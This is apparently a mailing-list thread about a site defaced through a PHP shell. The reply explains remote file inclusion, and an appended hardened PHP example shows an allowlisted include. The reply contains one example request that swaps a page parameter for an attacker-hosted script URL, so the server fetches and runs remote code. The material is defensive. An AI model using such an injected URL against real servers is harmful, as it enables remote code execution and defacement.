Hello
I got a defacing in my domains this weekend. They used a php shell to run some processes in the machine and replace all index.(html|shtml|php). They changed my users password too, and left a process in the /tmp dir running on port 80.
What do you call the use of a php-shell?
The thing is, if I turn on PHP Safe Mode, webmail and applications stop working (includes and execs).
Is there some way to secure PHP without losing half of its functionality?
Get more secure scripts (-;

AFAIK there are just a few possibilities to hack into a server by calling a php-script. The most common way (in fact a design error of the developer) is that a file to be included is passed as a parameter and someone replaces this value with a URL.

Example: You have a php-script named displaypage.php that gets the page to be displayed as a parameter named "page".

    displaypage.php?page=main.php

If someone changed the parameter to something like:

    displaypage.php?page=http://hackershelp.net/myscript.php

the interpreter will load this file and will execute it as a php-script. The attacker is able to do everything possible for a php-script.

You might be using a software that is known to have such a backdoor. I experienced this once with phpnuke, a free portal software written in php, that had this error too. The successful attack has been published on a hackers-server in Argentina that listed hundreds of other sites hacked by the use of the same backdoor.

Whether the inclusion of remote files is allowed is defined by the option 'allow_url_fopen'. You might want to check this.

Greetings
--
Bodo Kaelberer
http://www.webkind.de/
Politics is when many argue and nobody is happy.
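
The include-by-parameter flaw described in the reply above, with a hardened replacement, as an added example that is not part of the original thread. It assumes PHP 7.1 or later; the page names, the pages/ directory and the function names are hypothetical.

```php
<?php
// Added example, not code from the thread. Page names and pages/ are hypothetical.

// Vulnerable pattern described in the reply, shown for contrast only:
//   include $_GET['page'];   // displaypage.php?page=<anything, including a URL>

// Accepted "page" values mapped to files; anything not listed is rejected.
const ALLOWED_PAGES = [
    'main'    => 'main.php',
    'contact' => 'contact.php',
];

/** Return the absolute path for a requested page, or null if it is not allowed. */
function resolve_page($requested, array $allowed, string $baseDir): ?string
{
    if (!is_string($requested) || !isset($allowed[$requested])) {
        return null;   // URLs, ../ sequences and array parameters all stop here
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $allowed[$requested]);
    // Defence in depth: the resolved file must exist and sit inside $baseDir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/** Report the ini settings that govern remote includes. */
function remote_include_settings(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        // Separate switch for include/require, available since PHP 5.2.
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

$page = resolve_page($_GET['page'] ?? 'main', ALLOWED_PAGES, __DIR__ . '/pages');
if ($page === null) {
    http_response_code(404);
    exit('Page not found');
}
include $page;
```

Because the request value is only ever used as a key into ALLOWED_PAGES, the script keeps its include functionality without relying on Safe Mode.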